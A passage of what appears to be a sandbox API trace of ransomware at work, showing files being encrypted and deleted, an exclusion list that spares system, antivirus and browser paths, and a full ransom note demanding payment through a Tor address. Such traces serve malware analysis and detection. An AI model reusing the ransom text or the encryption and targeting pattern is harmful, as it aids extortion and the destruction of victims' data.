hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.277] GetLastError () returned 0x0 [0162.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.277] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.278] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.278] GetLastError () returned 0x0 [0162.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.278] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.278] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.278] GetLastError () returned 0x0 [0162.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.297] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 1 [0162.297] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms")) returned 1 [0162.301] CryptDestroyKey (hKey=0x9ad478) returned 1 [0162.301] wcslen (_String="OK") returned 0x2 [0162.301] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.301] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.301] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0162.301] CryptDestroyHash (hHash=0x9ad238) returned 1 [0162.301] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0162.301] PathMatchSpecW (pszFile="pkeyconfig.companion.dll", pszSpec="*NMCRYPT") returned 0 [0162.301] PathMatchSpecW (pszFile="pkeyconfig.companion.dll", pszSpec="*Recovers your files.html") returned 0 [0162.301] PathMatchSpecW (pszFile="pkeyconfig.companion.dll", pszSpec="*.exe") returned 0 [0162.301] PathMatchSpecW (pszFile="pkeyconfig.companion.dll", pszSpec="*.dll") returned 1 [0162.301] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0162.301] GetLastError () returned 0x12 [0162.301] FindClose (in: hFindFile=0x9ad1f8 | out: hFindFile=0x9ad1f8) returned 1 [0162.301] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0162.302] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0162.302] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0162.303] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0162.303] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.303] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.303] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0162.303] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.303] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*.exe") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*.dll") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*.lnk") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*.bat") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*.ini") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*.msi") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*.scf") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*pagefile.sys*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*NTUSER.DAT*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*AppData*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\winrar\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\java\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\windows\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\ESET\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\AVG\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\AVIRA\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*Atheros*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*Realtek*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*bootmgr*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*boot*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*boot*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*CONFIG.SYS*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*IO.SYS*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*MSDOS.SYS*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*NTDETECT.COM*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*ntldr*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*chrome*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*opera*") returned 0 [0162.303] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", pszSpec="*firefox*") returned 0 [0162.303] wcslen (_String="\\\\?\\") returned 0x4 [0162.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad438 [0162.304] wcscmp (_String1=".", _String2=".") returned 0 [0162.304] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.304] wcscmp (_String1="..", _String2=".") returned 1 [0162.304] wcscmp (_String1="..", _String2="..") returned 0 [0162.304] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0162.304] GetLastError () returned 0x12 [0162.304] FindClose (in: hFindFile=0x9ad438 | out: hFindFile=0x9ad438) returned 1 [0162.304] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0162.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.304] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0162.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.304] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*.exe") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*.dll") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*.lnk") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*.bat") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*.ini") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*.msi") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*.scf") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*pagefile.sys*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*NTUSER.DAT*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*AppData*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\winrar\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\java\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\windows\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\ESET\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\AVG\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\AVIRA\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*Atheros*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*Realtek*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*bootmgr*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*boot*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*boot*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*CONFIG.SYS*") returned 0 [0162.304] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*IO.SYS*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*MSDOS.SYS*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*NTDETECT.COM*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*ntldr*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*chrome*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*opera*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", pszSpec="*firefox*") returned 0 [0162.305] wcslen (_String="\\\\?\\") returned 0x4 [0162.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad7b8 [0162.305] wcscmp (_String1=".", _String2=".") returned 0 [0162.305] FindNextFileW (in: hFindFile=0x9ad7b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.305] wcscmp (_String1="..", _String2=".") returned 1 [0162.305] wcscmp (_String1="..", _String2="..") returned 0 [0162.305] FindNextFileW (in: hFindFile=0x9ad7b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.305] PathMatchSpecW (pszFile="OSE.EXE", pszSpec="*NMCRYPT") returned 0 [0162.305] PathMatchSpecW (pszFile="OSE.EXE", pszSpec="*Recovers your files.html") returned 0 [0162.305] PathMatchSpecW (pszFile="OSE.EXE", pszSpec="*.exe") returned 1 [0162.305] FindNextFileW (in: hFindFile=0x9ad7b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0162.305] GetLastError () returned 0x12 [0162.305] FindClose (in: hFindFile=0x9ad7b8 | out: hFindFile=0x9ad7b8) returned 1 [0162.305] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0162.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.305] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0162.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.305] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*.exe") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*.dll") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*.lnk") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*.bat") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*.ini") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*.msi") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*.scf") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*pagefile.sys*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*NTUSER.DAT*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*AppData*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\winrar\\*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\java\\*") returned 0 [0162.305] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\windows\\*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\ESET\\*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\AVG\\*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\AVIRA\\*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*Atheros*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*Realtek*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*bootmgr*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*boot*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*boot*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*CONFIG.SYS*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*IO.SYS*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*MSDOS.SYS*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*NTDETECT.COM*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*ntldr*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*chrome*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*opera*") returned 0 [0162.306] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", pszSpec="*firefox*") returned 0 [0162.306] wcslen (_String="\\\\?\\") returned 0x4 [0162.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad238 [0162.367] wcscmp (_String1=".", _String2=".") returned 0 [0162.367] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.368] wcscmp (_String1="..", _String2=".") returned 1 [0162.368] wcscmp (_String1="..", _String2="..") returned 0 [0162.368] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*NMCRYPT") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*Recovers your files.html") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*.exe") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*.dll") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*.lnk") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*.bat") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*.ini") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*.msi") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*.scf") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*pagefile.sys*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*NTUSER.DAT*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*AppData*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\winrar\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\java\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\windows\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\ESET\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\AVG\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\AVIRA\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*Atheros*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*Realtek*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*bootmgr*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*boot*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*boot*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*CONFIG.SYS*") returned 0 [0162.368] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*IO.SYS*") returned 0 [0162.369] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*MSDOS.SYS*") returned 0 [0162.369] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*NTDETECT.COM*") returned 0 [0162.369] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*ntldr*") returned 0 [0162.369] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*chrome*") returned 0 [0162.369] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*opera*") returned 0 [0162.369] PathMatchSpecW (pszFile="Bears.htm", pszSpec="*firefox*") returned 0 [0162.369] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm", pszSpec="*") returned 1 [0162.369] strlen (_Str="NMoreira") returned 0x8 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 